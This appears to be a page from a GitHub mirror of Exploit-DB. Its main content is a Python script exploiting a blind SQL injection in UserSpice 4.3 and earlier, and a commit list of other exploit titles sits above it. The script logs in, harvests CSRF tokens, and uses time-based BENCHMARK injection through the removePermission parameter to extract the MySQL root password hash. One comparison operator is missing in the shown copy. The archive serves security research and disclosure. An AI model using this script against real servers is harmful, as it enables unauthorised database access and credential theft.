bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/44101.py
Offensive Security ed38447971 DB: 2018-02-17 
45 changes to exploits/shellcodes

Microsoft Edge - 'UnmapViewOfFile' ACG Bypass
JBoss Remoting 6.14.18 - Denial of Service
Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < 4.25 - Denial of Service

ABRT - raceabrt Privilege Escalation(Metasploit)

Joomla! Component Fastball 1.1.0 < 1.2 - SQL Injection
Joomla! Component Fastball 1.1.0 < 1.2 - 'league' SQL Injection

Dasan Networks GPON ONT WiFi Router H640X versions 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 - Unauthenticated Remote Code Execution
Dasan Networks GPON ONT WiFi Router H640X 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 - Unauthenticated Remote Code Execution
EPIC MyChart - SQL Injection
TV - Video Subscription - Authentication Bypass SQL Injection
UserSpice 4.3 - Blind SQL Injection
Twig < 2.4.4 - Server Side Template Injection
Joomla! Component Kubik-Rubik Simple Image Gallery Extended (SIGE) 3.2.3 - Cross-Site Scripting
Joomla! Component Advertisement Board 3.1.0 - 'catname' SQL Injection
Joomla! Component Aist 2.0 - 'id' SQL Injection
Joomla! Component AllVideos Reloaded 1.2.x - 'divid' SQL Injection
Joomla! Component DT Register 3.2.7 - 'id' SQL Injection
Joomla! Component Fastball 2.5 - 'season' SQL Injection
Joomla! Component File Download Tracker 3.0 - SQL Injection
Joomla! Component Form Maker 3.6.12 - SQL Injection
Joomla! Component Gallery WD 1.3.6 - SQL Injection
Joomla! Component Google Map Landkarten 4.2.3 - SQL Injection
Joomla! Component InviteX 3.0.5 - 'invite_type' SQL Injection
Joomla! Component JB Bus 2.3 - 'order_number' SQL Injection
Joomla! Component jGive 2.0.9 - SQL Injection
Joomla! Component JomEstate PRO 3.7 - 'id' SQL Injection
Joomla! Component JquickContact 1.3.2.2.1 - SQL Injection
Joomla! Component JS Autoz 1.0.9 - SQL Injection
Joomla! Component JS Jobs 1.1.9 - SQL Injection
Joomla! Component JTicketing 2.0.16 - SQL Injection
Joomla! Component MediaLibrary Free 4.0.12 - SQL Injection
Joomla! Component NeoRecruit 4.1 - SQL Injection
Joomla! Component Project Log 1.5.3 - 'search' SQL Injection
Joomla! Component Realpin 1.5.04 - SQL Injection
Joomla! Component SimpleCalendar 3.1.9 - SQL Injection
Joomla! Component Smart Shoutbox 3.0.0 - SQL Injection
Joomla! Component Solidres 2.5.1 - SQL Injection
Joomla! Component Staff Master 1.0 RC 1 - SQL Injection
Joomla! Component Timetable Responsive Schedule For Joomla 1.5 - 'alias' SQL Injection
Joomla! Pinterest Clone Social Pinboard 2.0 - SQL Injection
Joomla Component ccNewsletter 2.x.x 'id' - SQL Injection
Joomla! Component Saxum Astro 4.0.14 - SQL Injection
Joomla! Component Saxum Numerology 3.0.4 - SQL Injection
Joomla! Component SquadManagement 1.0.3 - SQL Injection
Joomla! Component Saxum Picker 3.2.10 - SQL Injection
Front Accounting ERP 2.4.3 - Cross-Site Request Forgery
PHIMS - Hospital Management Information System - 'Password' SQL Injection
PSNews Website 1.0.0 - 'Keywords' SQL Injection
Oracle Primavera P6 Enterprise Project Portfolio Management - HTTP Response Splitting
2018-02-17 05:01:49 +00:00

93 lines
No EOL
2.4 KiB
Python
Executable file
Raw Blame History

#!/usr/env/python
"""
Application UserSpice PHP user management
Vulnerability UserSpice <= 4.3 Blind SQL Injection exploit
URL https://userspice.com
Date 1.2.2018
Author Dolev Farhi
About the App:
What makes userspice different from almost any other PHP User Management
Framework is that it has been designed from the
beginning to get out of your way so you can spend your time working on
your project
About the vulnerability:
Unsanitized input passed to removePermission parameter.
"""
import requests
import string
import sys
from bs4 import BeautifulSoup
userspice_host = '10.0.0.16'
userspice_user = 'admin'
userspice_pass = 'password'
userspice_login_url = 'http://%s//users/login.php' % userspice_host
userspice_vuln_url = 'http://%s/users/admin_page.php?id=75' %
userspice_host
guess_chars = string.ascii_lowercase + string.ascii_uppercase +
string.digits + string.punctuation
banner = """
-------------------------------------------------------
| userSpice <= 4.3 Blind SQL Injection Vulnerability" |
-------------------------------------------------------
"""
login_data = {
'dest':'',
'username':userspice_user,
'password':userspice_pass
}
payload = {
'process':'1',
'removePermission[]':'1',
'private':'Yes',
'changeTitle':''
}
s = requests.session()
def getCSRF(url):
req = s.get(url).text
soup = BeautifulSoup(req, "lxml")
csrf = soup.find('input', {"name" : "csrf"})
csrf_token = csrf['value']
return csrf_token
login_data_csrf = getCSRF(userspice_login_url)
login_data['csrf'] = login_data_csrf
req = s.post(userspice_login_url, data=login_data)
if 'login failed' in req.text.lower():
print('Login failed, check username/password')
sys.exit(1)
payload_data_csrf = getCSRF(userspice_vuln_url)
payload['csrf'] = payload_data_csrf
print(banner)
print('[+] Running...')
print('[+] Obtaining MySQL root hash... this may take some time.')
password = ""
for i in range(0, 61):
for c in guess_chars:
payload_data_csrf = getCSRF(userspice_vuln_url)
payload['csrf'] = payload_data_csrf
injection = "5); SELECT 1 UNION SELECT IF(BINARY
SUBSTRING(password,{0},1)='{1}',BENCHMARK(3000000,SHA1(1)),0) Password
FROM mysql.user WHERE User = 'root'#;".format(i, c)
payload['removePermission[]'] = injection
req = s.post(userspice_vuln_url, data=payload).elapsed.total_seconds()
if float(req) 0.6:
password += c
print('[+] %s' % password)
else:
pass
print('done')
sys.exit(0)
Reference in a new issue View git blame Copy permalink